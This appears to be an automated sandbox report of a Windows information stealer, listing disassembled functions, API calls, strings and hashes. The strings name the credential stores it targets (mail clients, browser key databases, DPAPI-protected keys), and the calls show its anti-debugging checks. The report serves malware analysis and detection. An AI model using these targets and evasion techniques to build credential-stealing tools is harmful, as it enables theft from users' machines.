6841->6817 6860 40b327 6841->6860 6842->6808 6843->6768 6844->6843 6845->6768 6847->6803 6863 40b387-40b38f 6847->6863 6849->6830 6879 40b40a 6849->6879 6886 40b475-40b48f 6850->6886 6851->6851 6852->6768 6853->6808 6855->6808 6860->6808 6863->6788 6863->6795 6879->6808 6881->6808 6884->6808 6886->6768
                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,74E2F770,74E2F770), ref: 0040B792
                                                                    • NtClose.NTDLL ref: 0040B7B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileRead
                                                                    • String ID: LK$Y[$ntdll.dll
                                                                    • API String ID: 752142053-4222218168
                                                                    • Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                                    • Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
                                                                    • Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                                    • Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F
                                                                    APIs
                                                                      • Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                                    • NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Query$InformationProcessVirtual
                                                                    • String ID: ]^4$^^4$^^4$^^4
                                                                    • API String ID: 1364735940-2923853987
                                                                    • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                                    • Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
                                                                    • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                                    • Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F
                                                                    APIs
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
                                                                    • GetSystemMetrics.USER32(00000001), ref: 004333C3
                                                                    • GetSystemMetrics.USER32(00000000), ref: 0043341E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MetricsSystem$Create
                                                                    • String ID: DISPLAY
                                                                    • API String ID: 1087689917-865373369
                                                                    • Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                                    • Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
                                                                    • Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                                    • Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B
                                                                    APIs
                                                                    • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
                                                                    • ExitProcess.KERNEL32 ref: 00402428
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcessSleep
                                                                    • String ID: Ku^%$Ku^%
                                                                    • API String ID: 911557368-1067927601
                                                                    • Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                                    • Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
                                                                    • Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                                    • Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B
                                                                    APIs
                                                                    • NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationProcessQuery
                                                                    • String ID: 9a%^$M%$M%
                                                                    • API String ID: 1778838933-3204844187
                                                                    • Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                                    • Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
                                                                    • Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                                    • Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
                                                                    • API String ID: 0-4169501468
                                                                    • Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                                    • Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
                                                                    • Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                                    • Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF
                                                                    APIs
                                                                    • lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcmpi
                                                                    • String ID: VL6T$VL6T$kernel32.dll
                                                                    • API String ID: 1586166983-858732239
                                                                    • Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                                    • Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
                                                                    • Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                                    • Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: UL6T$VL6T$VL6T$kernel32.dll
                                                                    • API String ID: 4038537762-2028718673
                                                                    • Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                                    • Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
                                                                    • Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                                    • Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CryptDataUnprotect
                                                                    • String ID: crypt32.dll$os_c576xedrypt.encry576xedpted_key
                                                                    • API String ID: 834300711-975908830
                                                                    • Opcode ID: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                                    • Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
                                                                    • Opcode Fuzzy Hash: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                                    • Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
                                                                    • lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat
                                                                    • String ID: \key4.db
                                                                    • API String ID: 4038537762-2908133219
                                                                    • Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                                    • Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
                                                                    • Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                                    • Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                                    • API String ID: 0-1928883120
                                                                    • Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                                    • Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
                                                                    • Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                                    • Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB
                                                                    APIs
                                                                      • Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                                      • Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                                    • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                    • API String ID: 3335090040-239921721
                                                                    • Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                                    • Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
                                                                    • Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                                    • Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gU@
                                                                    • API String ID: 0-63564854
                                                                    • Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                                    • Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
                                                                    • Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                                    • Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B
                                                                    APIs
                                                                    • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: ntdll.dll
                                                                    • API String ID: 3535843008-2227199552
                                                                    • Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                                    • Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
                                                                    • Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                                    • Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE
                                                                    APIs
                                                                    • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: ntdll.dll
                                                                    • API String ID: 3535843008-2227199552
                                                                    • Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                                    • Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
                                                                    • Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                                    • Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008ADB7E
                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 008ADB9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612871914.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8ad000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 3833638111-0
                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                    • Instruction ID: d3e4c5e0aaa62e8f14b528dfca0c88242ea5447ca53bb541063d1e3476908cc2
                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                    • Instruction Fuzzy Hash: 0FF0C2351007106FE7203AB8988DB6E76E8FF4A731F100528E653D1CC0DB70E8068A71
                                                                    APIs
                                                                    • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811
                                                                      • Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationLibraryLoadQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 1217483125-0
                                                                    • Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                                    • Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
                                                                    • Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                                    • Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B
                                                                    APIs
                                                                    • NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationProcessQuery
                                                                    • String ID:
                                                                    • API String ID: 1778838933-0
                                                                    • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                                    • Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
                                                                    • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                                    • Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B
                                                                    APIs
                                                                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationThread
                                                                    • String ID:
                                                                    • API String ID: 4046476035-0
                                                                    • Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                                    • Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
                                                                    • Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                                    • Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87
                                                                    APIs
                                                                    • NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                                    • Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
                                                                    • Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                                    • Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                                    • Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
                                                                    • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                                    • Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                                    • Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
                                                                    • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                                    • Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 4991 42f625-42f644 4992 42f64a-42f652 4991->4992 4993 42f654-42f659 4992->4993 4994 42f69b-42f6a0 4992->4994 4997 42f713-42f718 4993->4997 4998 42f65f-42f664 4993->4998 4995 42f756-42f75b 4994->4995 4996 42f6a6-42f6ab 4994->4996 5005 42f761-42f766 4995->5005 5006 42f8a4-42f8a9 4995->5006 4999 42f811-42f816 4996->4999 5000 42f6b1-42f6b6 4996->5000 5001 42f850-42f855 4997->5001 5002 42f71e-42f723 4997->5002 5003 42f7ca-42f7cf 4998->5003 5004 42f66a-42f66f 4998->5004 5017 42f81c-42f821 4999->5017 5018 42f9dd-42f9e2 4999->5018 5009 42f8fa-42f8ff 5000->5009 5010 42f6bc-42f6c1 5000->5010 5007 42f85b-42f860 5001->5007 5008 42fa0e-42fa13 5001->5008 5015 42f93b-42f940 5002->5015 5016 42f729-42f72e 5002->5016 5011 42f9b0-42f9b5 5003->5011 5012 42f7d5-42f7da 5003->5012 5019 42f675-42f67a 5004->5019 5020 42f8d8-42f8dd 5004->5020 5021 42f984-42f989 5005->5021 5022 42f76c-42f771 5005->5022 5013 42fa29-42fa2e 5006->5013 5014 42f8af-42f8b4 5006->5014 5041 42f866-42f86b 5007->5041 5042 42fa75-42fa86 lstrcatW 5007->5042 5039 42fa19-42fa1e 5008->5039 5040 42faad-42fab4 5008->5040 5053 42fc57-42fc6c lstrcatW 5009->5053 5054 42f905-42f90a 5009->5054 5045 42faf7-42fb08 lstrcatW 5010->5045 5046 42f6c7-42f6cc 5010->5046 5031 42f9bb-42f9c0 5011->5031 5032 42fcd8-42fcdf 5011->5032 5027 42f7e0-42f7e5 5012->5027 5028 42fb7d-42fbad 5012->5028 5043 42fa34-42fa39 5013->5043 5044 42fab9-42fac6 5013->5044 5047 42f8ba-42f8bf 5014->5047 5048 42fa8b-42faa8 5014->5048 5025 42fc71-42fc96 5015->5025 5026 42f946-42f94b 5015->5026 5049 42f734-42f739 5016->5049 5050 42fb0d-42fb39 5016->5050 5033 42f827-42f82c 5017->5033 5034 42fbe9-42fc18 call 42f625 call 430228 5017->5034 5035 42fce4-42fcef 5018->5035 5036 42f9e8-42f9ed 5018->5036 5037 42f680-42f685 5019->5037 5038 42facb-42fad9 5019->5038 5051 42f8e3-42f8e8 5020->5051 5052 42fc27-42fc4a 5020->5052 5029 42fca5-42fcc9 5021->5029 5030 42f98f-42f994 5021->5030 5023 42fd10-42fd17 5022->5023 5024 42f777-42f77c 5022->5024 5023->4992 5068 42f782-42f787 5024->5068 5069 42fb71-42fb78 5024->5069 5075 42fc9d-42fca0 5025->5075 5081 42fc98 5025->5081 5026->4992 5055 42f951-42f974 5026->5055 5072 42f7eb-42f7f0 5027->5072 5073 42fbbd-42fbd2 lstrcatW * 2 call 40b7bb 5027->5073 5074 42fbb3-42fbb8 5028->5074 5028->5075 5070 42fcd0-42fcd3 5029->5070 5083 42fccb 5029->5083 5030->4992 5056 42f99a-42f9ab lstrcatW 5030->5056 5031->4992 5057 42f9c6-42f9d8 lstrcatW 5031->5057 5032->4992 5076 42f832-42f84b call 447047 5033->5076 5077 42fd1c-42fd21 5033->5077 5065 42fc1b-42fc22 5034->5065 5062 42fcfb 5035->5062 5085 42fcf1-42fcf9 5035->5085 5036->4992 5058 42f9f3-42fa09 5036->5058 5059 42f68b-42f690 5037->5059 5060 42fade-42fae7 5037->5060 5038->4992 5061 42fa24 5039->5061 5039->5062 5040->4992 5041->4992 5079 42f871-42f894 5041->5079 5042->4992 5043->4992 5063 42fa3f-42fa70 call 419e6b call 447a80 * 2 5043->5063 5044->4992 5045->4992 5064 42f6d2-42f6d7 5046->5064 5046->5065 5047->4992 5082 42f8c5-42f8d3 5047->5082 5048->4992 5066 42fb49-42fb6c call 447047 lstrcatW 5049->5066 5067 42f73f-42f744 5049->5067 5050->5070 5071 42fb3f-42fb44 5050->5071 5051->4992 5084 42f8ee-42f8f5 5051->5084 5052->5070 5080 42fc50-42fc55 5052->5080 5053->4992 5054->4992 5086 42f910-42f91b call 40b129 5054->5086 5055->5070 5089 42f97a-42f97f 5055->5089 5056->4992 5057->4992 5058->4992 5059->4992 5090 42f692-42f699 5059->5090 5060->5070 5094 42faed-42faf2 5060->5094 5061->4992 5087 42fcfc 5062->5087 5063->4992 5064->4992 5092 42f6dd-42f703 5064->5092 5065->4992 5066->4992 5067->4992 5093 42f74a-42f751 5067->5093 5068->4992 5095 42f78d-42f7ba 5068->5095 5069->4992 5070->4992 5071->5070 5072->4992 5097 42f7f6-42f801 5072->5097 5109 42fbd7-42fbe4 5073->5109 5074->5075 5075->4992 5076->4992 5077->4992 5088 42fd27-42fd34 5077->5088 5079->5070 5101 42f89a-42f89f 5079->5101 5080->5070 5081->5075 5082->4992 5083->5070 5084->4992 5085->5023 5085->5062 5103 42f920-42f936 5086->5103 5087->5087 5089->5070 5090->4992 5092->5070 5105 42f709-42f70e 5092->5105 5093->4992 5094->5070 5095->5075 5106 42f7c0-42f7c5 5095->5106 5097->5070 5108 42f807-42f80c 5097->5108 5101->5070 5103->4992 5105->5070 5106->5075 5108->5070 5109->4992
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,?), ref: 0042F9A2
                                                                    • lstrcatW.KERNEL32(?,?), ref: 0042F9CF
                                                                    • lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
                                                                    • lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
